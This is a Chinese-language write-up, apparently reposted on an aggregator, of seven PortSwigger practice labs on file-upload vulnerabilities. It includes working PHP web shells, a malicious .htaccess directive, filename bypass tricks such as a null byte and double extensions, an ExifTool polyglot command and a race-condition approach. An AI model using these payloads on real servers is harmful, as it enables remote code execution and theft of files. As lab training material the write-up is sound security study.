【BP靶场portswigger-服务端8】文件上传漏洞-7个实验(全)

news2024/11/27 3:46:30

  

前言:

介绍: 

博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。


导读:

面向读者:对于网络安全方面的学者。 

本文知识点(读者自测): 

(1)有缺陷的文件类型验证(√)

(2)防止在用户可访问的目录中执行文件(√)

(3)危险文件类型的黑名单不足(√)

(4)文件内容的验证存在缺陷(√)

(5)利用文件上载争用条件(√)


目录

一、文件上传漏洞

1、意义:

2、影响

3、产生

4、服务器处理静态文件请求的机制

二、利用不受限制的文件上载来部署Web Shell

 1、简述:

        实验1:通过web shell上传的远程代码执行

三、利用文件上载的错误验证

1、简述:

2、有缺陷的文件类型验证

        实验2:通过内容类型限制旁路的Web shell上载

3、防止在用户可访问的目录中执行文件

        实验3:经由路径遍历的Web外壳上载

4、危险文件类型的黑名单不足

        实验4:通过扩展黑名单旁路的Web外壳上传

        实验5:通过模糊文件扩展名的Web外壳上传

5、文件内容的验证存在缺陷

        实验6:通过多语种web shell上传的远程代码执行

6、利用文件上载争用条件

        实验7:通过竞态条件的Web外壳上载

四、利用文件上载漏洞而不远程执行代码

1、上传恶意客户端脚本

2、利用上载文件解析中的漏洞

3、使用PUT上载文件


一、文件上传漏洞

1、意义:

1、原理:文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统,而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制,可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件


2、危害:在某些情况下,上传文件的行为本身就足以造成损害。其他攻击可能涉及对文件的后续HTTP请求,通常是为了触发服务器执行该文件

2、影响

1、文件上传漏洞的影响通常取决于两个关键因素:

    网站未能正确验证文件的哪个方面,无论是文件的大小、类型、内容等。
    文件成功上载后会对其施加哪些限制


2、在最坏的情况下,文件的类型没有得到正确的验证,服务器配置允许某些类型的文件(如.php和.jsp)作为代码执行。在这种情况下,攻击者可能会上载充当Web外壳的服务器端代码文件,从而有效地授予他们对服务器的完全控制权。


3、如果文件名未正确验证,则攻击者只需上载同名文件即可覆盖重要文件。如果服务器也容易受到目录遍历的攻击,这可能意味着攻击者甚至能够将文件上载到意想不到的位置。


4、如果无法确保文件大小预期阈值范围内,还可能会启用某种形式的拒绝服务(DoS)攻击,攻击者会借此填满可用磁盘空间。 

3、产生

1、现状:考虑到相当明显的危险,很少有网站对用户可以上传的文件没有任何限制。更常见的情况是,开发人员实现他们认为是健壮的验证,但这些验证要么存在固有缺陷,要么很容易被绕过。


2、绕过:如试图将危险的文件类型列入黑名单,但在检查文件扩展名时无法考虑解析差异。与任何黑名单一样,它也很容易意外地忽略了更模糊的文件类型,这些文件类型可能仍然是危险的。


3、工具:在其他情况下,网站可能会尝试通过验证攻击者可以使用Burp Proxy或Repeater等工具轻松操纵的属性来检查文件类型。


4、结论:即使是稳健的验证措施也可能在构成网站的主机和目录网络中应用不一致,导致可能被利用的差异。

4、服务器处理静态文件请求的机制

1、前提:在研究如何利用文件上传漏洞之前,必须了解服务器如何处理静态文件请求


2、历史:网站几乎完全由静态文件组成,当用户请求时,这些静态文件将被提供给用户。因此,每个请求的路径可以与服务器文件系统上的目录和文件的层次结构1:1映射。


3、现状:网站的动态性越来越强,请求的路径通常与文件系统没有任何直接关系。但web服务器仍然处理对一些静态文件的请求,包括样式表、图像等等。


4、结论:处理这些静态文件的过程在很大程度上仍然相同。在某些时候,服务器解析请求中的路径以标识文件扩展名。然后使用该映射来确定所请求文件的类型,通常是将其与扩展名和MIME类型之间的预配置映射列表进行比较。接下来会发生什么取决于文件类型和服务器的配置。 


5、示例

(1)不可执行文件:文件类型是不可执行的,例如图像或静态HTML页面,则服务器可能只会在HTTP响应中将文件的内容发送到客户机。
(2)可执行文件:文件类型为可执行文件(如PHP文件),并且服务器配置为执行此类型的文件,则服务器将在运行脚本之前根据HTTP请求中的标头和参数分配变量。然后可以在HTTP响应中将结果输出发送到客户端。
(3)可执行文件,但配置不执行:文件类型为可执行文件,但服务器不是配置为执行此类型的文件时,它通常会以错误响应。但在某些情况下,文件的内容可能仍以纯文本形式提供给客户端。此类错误配置偶尔会被利用来泄漏源代码和其他敏感信息。

二、利用不受限制的文件上载来部署Web Shell

 1、简述:

1、从安全角度来看,最糟糕的情况是网站允许您上载服务器端脚本(如PHP、Java或Python文件),并且还配置为将它们作为代码执行。这使得在服务器上创建自己的web shell变得很简单。


2、Web shell是一种恶意脚本,攻击者只需通过向正确的端点发送HTTP请求,就可以在远程Web服务器上执行任意命令



3、如果能够成功地上传一个web shell,那么实际上就拥有了对服务器的完全控制。这意味着可以读取和写入任意文件、泄露敏感数据,甚至使用服务器来针对内部基础架构和网络外部的其他服务器发起攻击。

例如,以下PHP一行程序可用于从服务器的文件系统读取任意文件:
<?php echo file_get_contents('/path/to/target/file'); ?>

上传后,发送此恶意文件的请求将在响应中返回目标文件的内容

1、更通用的web shell可能如下所示:
<?php echo system($_GET['command']); ?>

2、此脚本允许通过查询参数传递任意系统命令,如下所示:
GET /example/exploit.php?command=id HTTP/1.1

4、涉及实验:

实验1:通过web shell上传的远程代码执行

实验1:通过web shell上传的远程代码执行

信息:

本实验包含易受攻击的图像上载函数。在将用户上传的文件存储到服务器的文件系统之前,它不会对这些文件执行任何验证。

要完成实验,请上传一个基本的PHP Web shell,并使用它来过滤文件/home/carlos/secret的内容并提交

已有账号:wiener:peter


part1:

通过Burp代理流量时,登录您的帐户,注意上传头像图像的选项


上传任意图片,然后返回您的帐户页面(页面上现在显示了虚拟形象的预览)

(测试发现,其实对于上传的文件类型,没有任何限制)

效果展示


part2:

分析数据包

HTTP历史记录-----单击过滤器栏以打开"过滤器设置"对话框------启用"图像"复选框

 

在代理历史记录中,请注意您的图像是使用 GET 请求/files/avatars/&lt获取的


part3:

完成实验

电脑上,创建一个php的文件,其中包含用于获取Carlos秘密文件内容的脚本(或者直接使用后门代码get shell),如:

<?php echo file_get_contents('/home/carlos/secret'); ?>


使用头像上传功能上传恶意PHP文件

 并上传成功(因为不是图片,所以加载不出来)

 在响应中可以回显加载的内容,被以text文件形式显示

也可以在Burp Repeater中,更改请求的路径以指向PHP文件

 完成实验

 

三、利用文件上载的错误验证

1、简述:

1、现状:不太可能找到对文件上传攻击没有任何保护的网站。但仅仅因为防御到位,并不意味着他们是强大的。


2、将了解Web服务器尝试验证和清理文件上载的一些方法,以及如何利用这些机制中的缺陷来获取用于远程代码执行的Web shell。

2、有缺陷的文件类型验证

1、提交HTML表单时,浏览器通常将提供的数据发送到后请求的内容类型application/x-www-form-url-encoded。这适用于发送简单文本,如姓名、地址等,但不适用于发送大量二进制数据,如整个图像文件或PDF文档。在本例中,内容类型multipart/form-data是优选的方法。


2、考虑一个表单,其中包含用于上载图像、提供图像描述和输入用户名的字段。提交这样的表单可能会导致类似下面的请求: 
 

POST /images HTTP/1.1
Host: normal-website.com
Content-Length: 12345
Content-Type: multipart/form-data; boundary=---------------------------012345678901234567890123456

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="image"; filename="example.jpg"
Content-Type: image/jpeg

[...binary content of example.jpg...]

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="description"

This is an interesting description of my image.

---------------------------012345678901234567890123456
Content-Disposition: form-data; name="username"

wiener
---------------------------012345678901234567890123456--

3、处理:消息正文被拆分为表单的每个输入的单独部分。每个部分都包含一个Content-Disposition头,它提供了与之相关的输入字段的一些基本信息。这些单独的部分还可能包含它们自己的Content-Type头,它告诉服务器使用此输入提交的数据的MIME类型。


4、利用:网站尝试验证文件上载的一种方法是检查此特定于输入的Content-Type标头是否与预期的MIME类型匹配。如果服务器只需要图像文件,它可能只允许image/jpeg和image/png这样的类型。当服务器隐式信任此标头的值时,可能会出现问题。如果没有执行进一步的验证来检查文件的内容实际上是否与假定的MIME类型匹配,则可以使用Burp Repeater之类的工具轻松绕过此防御
 


5、涉及实验:

实验2:通过内容类型限制旁路的Web shell上载

实验2:通过内容类型限制旁路的Web shell上载

信息:

本实验包含易受攻击的图像上载函数。它试图阻止用户上载意外的文件类型,但依赖于检查用户可控的输入来验证这一点。

要完成实验,请上传一个基本的PHP Web shell,并使用它来过滤文件/home/carlos/secret的内容并提交

已有账号:wiener:peter


part1:

登录并上传图像作为头像,然后返回帐户页面
HTTP历史记录中,请求类型GET /files/avatars/<YOUR-IMAGE>

在您的系统上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本。

例如:
<?php echo file_get_contents('/home/carlos/secret'); ?>

图片样式未变,说明有检测(上传失败)

分析数据包(对文件类型应该是有检测)


part2:

拦截数据包进行分析


响应表明您只能上载MIME类型为image/jpeg或image/png的文件

修改Content-Type值,并发送

文件成功上传


part3:

完成实验

直接在HTTP记录中查看响应包中返回的数据

Cw5LnCcKlcIEB9qeBBXq5bQl1t88jRx9


 

 

3、防止在用户可访问的目录中执行文件

1、虽然首先防止危险的文件类型被上传显然更好,但第二道防线是阻止服务器执行任何从网络上溜走的脚本。


2、作为预防措施,服务器通常只运行那些MIME类型被显式配置为可执行的脚本。否则,它们可能只返回某种错误消息,或者在某些情况下,将文件的内容作为纯文本提供:

GET /static/exploit.php?command=id HTTP/1.1
Host: normal-website.com


HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 39

<?php echo system($_GET['command']); ?>

3、这种行为可能会提供一种泄漏源代码的方法,但它会使任何创建web shell的尝试无效


4、这种配置通常因目录而异。用户提供的文件上载到的目录可能比文件系统上其他位置(假定最终用户无法访问)具有更严格的控制。如果能找到一种方法将脚本上载到不应该包含用户提供的文件的不同目录,那么服务器最终可能会执行您的脚本

5、还应该注意到,即使可能将所有请求发送到同一个域名,这通常指向某种反向代理服务器,如负载平衡器。请求通常由其他服务器在后台处理,这些服务器的配置也可能有所不同。 


6、涉及实验:
实验3:经由路径遍历的Web外壳上载

实验3:经由路径遍历的Web外壳上载

信息:

本实验包含易受攻击的图像上载函数。服务器配置为阻止执行用户提供的文件,但利用次要漏洞可以绕过此限制。

要完成实验,请上传一个基本的PHP Web shell,并使用它来过滤文件/home/carlos/secret的内容并提交
已有账号:wiener:peter


part1:

登录并上传图像作为您的头像,然后返回帐户页面

电脑上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本。

例如:
<?php echo file_get_contents('/home/carlos/secret'); ?>

虽然上传成功,但服务器没有执行脚本并返回输出,而是以纯文本形式返回PHP文件的内容


part2:

在Burp的代理历史记录中,找到用于提交文件上传的POST/my-account/avatar请求,并将其发送到Burp Repeater

找到与PHP文件相关的请求主体部分。在Content-Disposition标头中,更改文件名以包含目录遍历序列:
Content-Disposition: form-data; name="avatar"; filename="../1.php"

注意响应显示文件avatars/1.php已经上传。这表明服务器正在从文件名中剥离目录遍历序列

 


part3:

进行URL编码

filename="..%2fexploit.php"

 程序对URL编码进行了解码

刷新主页,并在Burp的代理历史记录中,找到GET /files/avatars/..%2f1.php文件请求,发送到repeater

将请求修改为../1.php

返回包中包含了数据

 

 

4、危险文件类型的黑名单不足

1、机制:防止用户上传恶意脚本的一个更明显的方法是将具有潜在危险的文件扩展名(如.php)列入黑名单。黑名单的做法是有内在缺陷的,因为很难显式地阻止每一个可能用于执行代码的文件扩展名。这种黑名单有时可以通过使用不太为人所知的、仍然可以执行的替代文件扩展名(如.php5、.shtml等)来绕过。


2、覆盖服务器配置

服务器通常不会执行文件,除非它们被配置为执行文件。

例如,在Apache服务器执行客户端请求的PHP文件之前,开发人员可能需要将以下指令添加到/etc/apache 2/apache2.conf文件中:
LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php

3、许多服务器还允许开发人员在各个目录中创建特殊的配置文件,以便覆盖或添加到一个或多个全局设置。例如,Apache服务器将从名为. htaccess网站如果存在话。

同样,开发人员可以使用web.config文件。这可能包括如下指令,在本例中,这些指令允许将JSON文件提供给用户:
<staticContent>
    <mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>

Web服务器使用这些类型的配置文件(如果存在),但通常不允许使用HTTP请求访问它们。但可能偶尔会发现服务器无法阻止上载自己的恶意配置文件。在这种情况下,即使需要的文件扩展名被列入黑名单,也可以欺骗服务器将任意的自定义文件扩展名映射到可执行MIME类型
 

————

4、涉及实验:

实验4:通过扩展黑名单旁路的Web外壳上传


5、混淆文件扩展名

即使是最详尽的黑名单也可以使用经典的模糊技术绕过。假设验证代码区分大小写,无法识别exploit.pHp实际上是一个.php文件。如果随后将文件扩展名映射到MIME类型的代码不区分大小写,则这种差异允许您偷偷地让恶意PHP文件通过最终可能由服务器执行的验证。

方法:

    1、提供多个扩展名。根据用于解析文件名的算法,以下文件可能被解释为PHP文件或JPG图像:exploit.php.jpg
    2、添加尾随字符。有些组件会去除或忽略尾随的空格、点等:exploit.php.
    3、尝试对点、正斜杠和反斜杠使用URL编码(或双URL编码)。如果在验证文件扩展名时没有解码该值,但后来在服务器端解码了该值,这也会允许您上传恶意文件,否则这些文件将被阻止:利用%2Ephp
    4、在文件扩展名前添加分号或URL编码的空字节字符。例如,如果验证是用PHP或Java等高级语言编写的,但服务器使用C/C++中的低级函数来处理文件,则这可能会导致文件名末尾的处理不一致:开发工具. asp;.jpg或利用. asp%00.jpg
    5、尝试使用多字节unicode字符,在unicode转换或规范化之后,这些字符可能会转换为空字节和点。像这样的序列xC0 x2E,xC4 xAE或xC0 xAE可以被翻译成x2E如果文件名被解析为UTF-8字符串,但在用于路径之前转换为ASCII字符。

6、其他防御措施包括剥离或替换危险的扩展名,以防止文件被执行。如果此转换不是递归应用的,则可以将禁用的字符串放置在适当的位置,以便在删除它时仍然保留有效的文件扩展名。

例如,php语言(非递归剥离)
exploit.p.phphp

————

7、涉及实验:

实验5:通过模糊文件扩展名的Web外壳上传

实验4:通过扩展黑名单旁路的Web外壳上传

信息:

本实验包含易受攻击的图像上载函数。某些文件扩展名被列入黑名单,但由于此黑名单配置中的基本缺陷,可以绕过此防御。

要解决实验问题,请上传一个基本的PHP Web shell,然后使用它对文件/home/carlos/secret的内容进行过滤并提交

已有账号:wiener:peter


part1:

登录并上传图像作为您的头像,然后返回帐户页面

电脑上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本。

例如:
<?php echo file_get_contents('/home/carlos/secret'); ?>

上传失败

在HTTP历史记录中,数据请求以POST /files/avatars/<YOUR-IMAGE>

PHP文件不被允许


part2:

将POST/my-account/avatar请求发送到repeater

    1、将filename参数的值更改为.htaccess
    2、将Content-Type标头的值更改为text/plain
    3、用以下Apache指令替换文件(PHP有效负载)的内容:AddType application/x-httpd-php .l33t
这会将任意扩展名(.l33t)映射到可执行MIME类型application/x-httpd-php。由于服务器使用mod_php模块,它已经知道如何处理这个问题

发送请求并观察文件已成功上载


part3:

上传PHP载荷的文件

将filename参数的值从php后缀更改为l33t后缀。再次发送请求,并注意到文件已成功上载

上传成功


 


part4:

完成实验

 浏览响应包数据

YNwxnSxzWSFL7rX12qozRhxc24WQxpEO

 

 

实验5:通过模糊文件扩展名的Web外壳上传

信息:

本实验包含易受攻击的图像上载函数。某些文件扩展名被列入黑名单,但使用经典的模糊技术可以绕过这种防御。

要解决实验问题,上传一个基本的PHP Web shell,然后使用它对文件/home/carlos/secret的内容进行过滤并提交
已有账号:wiener:peter


part1:

登录并上传图像作为您的头像,然后返回帐户页面

电脑上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本

<?php echo file_get_contents('/home/carlos/secret'); ?>

响应表明只允许您上载JPG和PNG文件


part2:

 在Burp的HTTP历史记录中,找到用于提交文件上传的POST/my-account/avatar请求。把这个发给repeater

在Burp Repeater中,转到POST/my-account/avatar请求的选项卡,找到与PHP文件相关的身体部分。

在Content-Disposition标头中,更改filename参数的值,使其包含URL编码的空字节,后跟. jpg扩展名:
filename="1.php%00.jpg"


发送请求并观察文件是否已成功上载(消息将文件称为1.php,这表明空字节和. jpg扩展名已经被去除)

修改数据,并关闭拦截

回到主页,上传成功并加载


part3:

完成实验

在HTTP历史记录中浏览请求包

并发送到repeater

 修改文件名(截断后的文件名)

 

 

5、文件内容的验证存在缺陷

1、而不是完全信任Content-Type在请求中指定,则更安全的服务器会尝试验证文件的内容是否确实与预期内容匹配。


2、在图像上传功能的情况下,服务器可能会尝试验证图像的某些固有属性,例如其尺寸。如果尝试上传一个PHP脚本,它将根本没有任何维度。因此服务器可以推断它不可能是图像,并相应地拒绝上载。


3、类似地,某些文件类型可能总是在其页眉或页脚中包含特定的字节序列。这些可以像指纹或签名一样用于确定内容是否与预期类型匹配。如JPEG文件始终以字节FF D8 FF开始。


4、这是一种更加健壮的文件类型验证方法,但即使这样也不是万无一失的。使用ExifTool等特殊工具,创建元数据中包含恶意代码的多语言JPEG文件可能很简单。 


5、涉及实验:
实验6:通过多语种web shell上传的远程代码执行

实验6:通过多语种web shell上传的远程代码执行

信息:

本实验包含易受攻击的图像上载函数。尽管它会检查文件的内容以验证它是一个真正的映像,但仍然可以上载和执行服务器端代码。

要解决实验问题,请上传一个基本的PHP Web shell,然后使用它对文件/home/carlos/secret的内容进行过滤并提交

已有账号:wiener:peter


part1:

登录并上传图像作为您的头像,然后返回帐户页面

电脑上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本

<?php echo file_get_contents('/home/carlos/secret'); ?>

响应表明服务器成功阻止您上载非图像文件


part2:

先在kali中安装软件

输入
exiftool

准备一个图片

 

创建一个多语言PHP/JPG文件,该文件基本上是一个普通的图像,但在其元数据中包含PHP有效负载。执行此操作的简单方法是从命令行下载并运行ExifTool,如下所示:
 

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o 2.php

或者在Windows上下载一个exe文件

./ExifTool.exe -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test.png -o 2.php

 

生成的2.php

 


 


part3:

上传2.php文件


part4:

完成实验

在HTTP历史记录中浏览请求包

找到GET/files/avatars/2.php请求

使用消息编辑器的搜索功能在响应的二进制映像数据中查找START字符串(在START和END字符串之间)

我的为:
START aH5pHp2hMMgR0pczTx9c5UCo48I5eDf2 END

 提交完成实验

 

6、利用文件上载争用条件

1、现代框架更能抵御这类攻击。它们通常不会将文件直接上载到文件系统上的预定目的地。相反会采取一些预防措施,比如先上传到一个临时的沙箱目录,然后随机化名称以避免覆盖现有文件。然后对该临时文件执行验证,并仅在认为安全时才将其传输到目标。


2、即开发人员有时独立于任何框架实现自己的文件上传处理。这样做不仅相当复杂,而且还可能引入危险的争用条件,使攻击者能够完全绕过甚至是最健壮的验证。


3、如一些网站直接将文件上传到主文件系统,如果没有通过验证,则再次删除它。这种行为在依赖于防病毒软件等来检查恶意软件的网站中是典型的。这可能只需要几毫秒的时间,但由于文件在服务器上存在的时间很短,攻击者仍有可能执行它。


4、这些漏洞通常非常隐蔽,因此在黑盒测试期间很难检测到,除非能够找到泄漏相关源代码的方法。 


5、涉及实验:
实验7:通过竞态条件的Web外壳上载


6、基于URL的文件上载中的争用条件

1)在允许通过提供URL来上载文件的函数中也会出现类似的争用情况。在这种情况下,服务器必须通过Internet获取文件并创建本地副本,然后才能执行任何验证。

2)由于文件是使用HTTP加载的,因此开发人员无法使用其框架的内置机制来安全地验证文件。相反可以手动创建自己的进程来临时存储和验证文件,这可能不是很安全。

3)例如,如果文件以随机化名称加载到临时目录中,则理论上攻击者应该不可能利用任何争用条件。如果他们不知道目录的名称,他们将无法请求文件以触发其执行。另一方面,如果随机化的目录名是使用伪随机函数(如PHP的uniqid())生成的,则它可能会被强制执行。

4)要使此类攻击变得更容易,可以尝试延长处理文件所需的时间,从而延长暴力强制目录名的窗口。其中一种方法是上传一个更大的文件。如果它是分块处理的,那么可能会利用这一点,创建一个恶意文件,该文件的开头是有效负载,后面是大量的任意填充字节

实验7:通过竞态条件的Web外壳上载

信息:

本实验包含易受攻击的图像上载函数。尽管它对上载的任何文件都执行可靠的验证,但也可以通过在处理文件的方式中利用争用条件来完全绕过此验证。

要解决实验问题,请上传一个基本的PHP Web shell,然后使用它对文件/home/carlos/secret的内容进行过滤并提交
已有账号:wiener:peter


part1:

登录并上传图像作为您的头像,然后返回帐户页面

电脑上,创建一个php文件,其中包含一个用于获取Carlos秘密内容的脚本

<?php echo file_get_contents('/home/carlos/secret'); ?>

响应表明只允许您上载JPG和PNG文件(后缀的限制)


part2:

 在Burp的HTTP历史记录中,找到用于提交文件上传的POST/my-account/avatar请求。把这个发给repeater

(测试发现,无法截断)

filename="1.php%00.jpg"

filename="1.php.jpg"

 
 


part3:

题目提供方法(不可行,后面有我使用的方法)

1、在脚本中,替换<YOUR-POST-REQUEST>为包含1.php文件的完整POST /my-account/avatar请求。
2、替换<YOUR-GET-REQUEST>为获取上载的PHP文件的GET请求。
3、在Turbo Intruder窗口底部,单击Attack(攻击)。这个脚本将提交一个POST请求来上传1.php文件,然后立即向/files/avatars/1.php提交5个GET请求。

 POST是上传1.php

 GET是请求1.php(5次)


part4:

我使用的方法

第一步:

将GET请求发送到工具模块

 设置空载荷,进行无限制请求,并点击开始攻击

第二步:

手动发送POST上传1.php请求

 观察攻击结果

有2个访问2.php成功


part5:

完成实验:

I2QietA8if5UkM16O8dz1cFrtgeIC2Vi

 



四、利用文件上载漏洞而不远程执行代码

1、上传恶意客户端脚本

1、虽然可能无法在服务器上执行脚本,但仍然可以上载脚本以进行客户端攻击。如果可以上载HTML文件或SVG图像,则可以使用<script>标记创建存储的XSS有效负载。

————

2、如果上载的文件随后出现在其他用户访问的页面上,则他们的浏览器将在尝试呈现该页面时执行该脚本(由于同源策略限制,这些类型的攻击只有在上载文件来自与上载文件相同的源时才会起作用)
 


2、利用上载文件解析中的漏洞

1、如果上传的文件看起来存储和提供都很安全,那么最后的办法就是尝试利用解析或处理不同文件格式时特有的漏洞

————

2、如知道服务器解析基于XML的文件,如MicrosoftOffice文件或. xls文件,这可能是潜在的XXE注射液攻击。 


3、使用PUT上载文件

值得注意的是,一些web服务器可能被配置为支持PUT请求。如果没有适当的防御措施,这可能会提供上传恶意文件的替代方法,即使无法通过Web界面使用上传功能。

PUT /images/1.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49

<?php echo file_get_contents('/path/to/file'); ?>



网络安全三年之约

​First year 

掌握各种原理、不断打新的靶场

​目标:edusrc、cnvd 

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/


​second year 

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

​目标:众测平台、企业src应急响应中心 

众测平台URL
漏洞盒子漏洞盒子 | 互联网安全测试众测平台
火线安全平台火线安全平台
漏洞银行BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
360漏洞众包响应平台360漏洞云漏洞众包响应平台
补天平台(奇安信)补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
春秋云测首页
雷神众测(可信众测,安恒)雷神众测 - BountyTeam
云众可信(启明星辰)云众可信 - 互联网安全服务引领者
ALLSECALLSEC
360众测360众测平台
看雪众测(物联网)https://ce.kanxue.com/
CNVD众测平台网络安全众测平台
工控互联网安全测试平台CNCERT工业互联网安全测试平台
慢雾(区块链)Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
平安汇聚http://isrc.pingan.com/homePage/index

互联网大厂URL
阿里https://asrc.alibaba.com/#/
腾讯https://security.tencent.com/
百度https://bsrc.baidu.com/v2/#/home
美团https://security.meituan.com/#/home
360https://security.360.cn/
网易https://aq.163.com/
字节跳动https://security.bytedance.com/
京东https://security.jd.com/#/
新浪http://sec.sina.com.cn/
微博https://wsrc.weibo.com/
搜狗http://sec.sogou.com/
金山办公https://security.wps.cn/
有赞https://src.youzan.com/


Third Year 

学习最新的知识,建全自己的渗透体系

​目标:参与护网(每一个男孩子心中的梦想) 

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/153609.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Linux应用编程---13.网络编程

Linux应用编程—13.网络编程 ​ 网络编程要熟悉一些计算机网络有关的名词&#xff0c;可以先做了解&#xff0c;后续实际开发在深入研究&#xff0c;自上而下学习。与本次Linux应用编程有关的就是TCP与UDP协议。简明概念如下图1所示。 图1 计算机网络体系结构 ​ 前面学习的进…

数控机床各种加工模式以及英文简写

AUTO&#xff08;自动模式&#xff09; 机床自动运行加工程序&#xff0c;对零件进行加工。前提是所编的程序经过试验后是可行的&#xff0c;而且是加工出来的件经过检验后是合格的&#xff0c;才可以使用该程序。 EDIT&#xff08;编辑模式&#xff09; 在此模式下&#xff…

Spring Boot集成第三方登录之微博登录

准备工作 微博开放平台&#xff1a;https://open.weibo.com/ 网站接入 登陆微博开放平台&#xff0c;进入微连接&#xff0c;选择网站接入 点击立即接入 开发者信息认证 填写开发者信息与身份认证信息 创建应用 开发者信息认证通过后即可创建应用。 应用创建成功后会得到app …

哪种台灯质量好又实惠?性价比最高的护眼台灯

l 只要台灯质量过关就是及格的第一步&#xff0c;首先就是有3C质量认证&#xff0c;符合国A或国AA照度标准。l 显色也会是很重要的&#xff0c;光源品质高的产品&#xff0c;显色性不会低于Ra90的&#xff0c;太阳光的显色指数&#xff1d;100&#xff0c;那么意味着显色指数越…

一文详解Paramiko安装与使用

项目要求 定期向特定服务器传输软件运行状况文件&#xff08;基于SFTP&#xff09;&#xff0c;因此计划写一个Python脚本&#xff0c;该脚本首先要定期读取产品运营数据&#xff0c;然后按要求生成数据文件&#xff0c;最后通过 Paramiko 上传到SFTP服务器。 这篇文章是我在实…

【Spring源码】19. 没合适的构造器?找determineCandidateConstructors()!

上篇介绍了instantiateBean()&#xff08;其实这个方法在后面还会再次被调用&#xff09;如果在前两篇的内容结束后都还未获取到构造函数&#xff0c;那么则继续向下执行&#xff0c;调用determineConstructorsFromBeanPostProcessors()方法determineConstructorsFromBeanPostP…

如何确定梯度消失/爆炸和解决梯度消失/爆炸

1、梯度消失的原因和表现1.1、梯度消失的原因&#xff1a;在深层网络中&#xff0c;如果激活函数的导数小于1&#xff0c;根据链式求导法则&#xff0c;靠近输入层的参数的梯度因为乘了很多的小于1的数而越来越小&#xff0c;最终就会趋近于0&#xff0c;例如sigmoid函数&#…

【C++常用算法】STL基础语法学习 | 算数生成算法集合算法

目录 ●accumulate ●fill ●set_intersection ●set_union ●set_difference ●accumulate 1.功能描述&#xff1a; 计算容器内元素累计总和 2.查看accumulate定义下底层代码的函数原型&#xff1a; 3.向vector容器中插入0~100&#xff0c;使用accumulate算法去计算其和…

RabbitMQ的五大常用模型介绍以及SpringAMQP的使用

目录MQ的介绍使用MQ的好处技术对比RabbitMQ的使用Docker启动MQ角色介绍五大常用消息模型使用SpringAMQP模板简单队列模型工作队列模型广播模型 Fanout路由模式 Direct主题模式 TopicMQ的介绍 MQ&#xff0c;MessageQuene即 消息队列&#xff0c;是程序与程序之间的异步通信一种…

spring的IOC与DI小案例

注&#xff1a;本博客用于自学&#xff0c;如有错误&#xff0c;敬请指正。 一、首先要了解的概念 IOC是一种思想&#xff1a;将创建、初始化对象的控制权交给IOC容器 IOC容器&#xff1a;用来装对象的容器 Bean&#xff1a;IOC容器中装的对象 DI&#xff1a;将IOC容器种Bean…

打破光缆资源管理难题

如何打破光缆资源管理难题&#xff0c;将光缆资源价值最大化&#xff0c;相信是每个运维人都关心的焦点问题。 一、背景 全业务发展到今天&#xff0c;我们逐渐意识到&#xff0c;市场竞争的核心已聚焦到传输资源。从拼资源总量到拼资源管理&#xff0c;传统的运维管理模式面临…

【每日一题】【LeetCode】【第九天】存在重复元素

解决之路 题目描述 测试案例&#xff08;部分&#xff09; 第一次 关键就是看是否有重复元素&#xff0c;暴力解法就是双循环&#xff0c;然后有相同元素就返回True&#xff0c;否则就等循环结束&#xff0c;返回False。 但是自己想到了另一个只需要一个循环的解法。用一个…

C++11 简化 “策略模式” 的一种思路

策略模式是一种定义一系列算法的模式&#xff0c;从概念上看&#xff0c;所有这些算法完成的都是相同接口的工作&#xff08;只是实现不同&#xff09;&#xff0c;它可以以相同的方式调用所有的算法&#xff0c;减少了各种算法类与使用算法的类之间的耦合。实践中只要在分析过…

开发者工具中performance面板解析

目录总览设置面板网络性能总览图火焰图&#xff1a;耗费的时间相关信息总览 如图&#xff0c;主要分为以下4个方面 设置面板 1&#xff0c; 不刷新页面进行录制 2&#xff0c;刷新页面进行录制 3&#xff0c;删除性能展示页面 4&#xff0c;上传本地的性能页面 5&#xff0c…

若依mybatis升级mybatis-plus,其他也适用

若依mybatis升级mybatis-plus,其他也适用 本文档记录若依mybatis升级plus,其他也类似 文章目录若依mybatis升级mybatis-plus,其他也适用第一步 修改ruoyi-common的pom.xml第二步 修改ruoyi-admin的application.yml第三步 修改ruoyi-framework的MyBatisConfig.java开始测试1. 修…

一、计算机系统概论

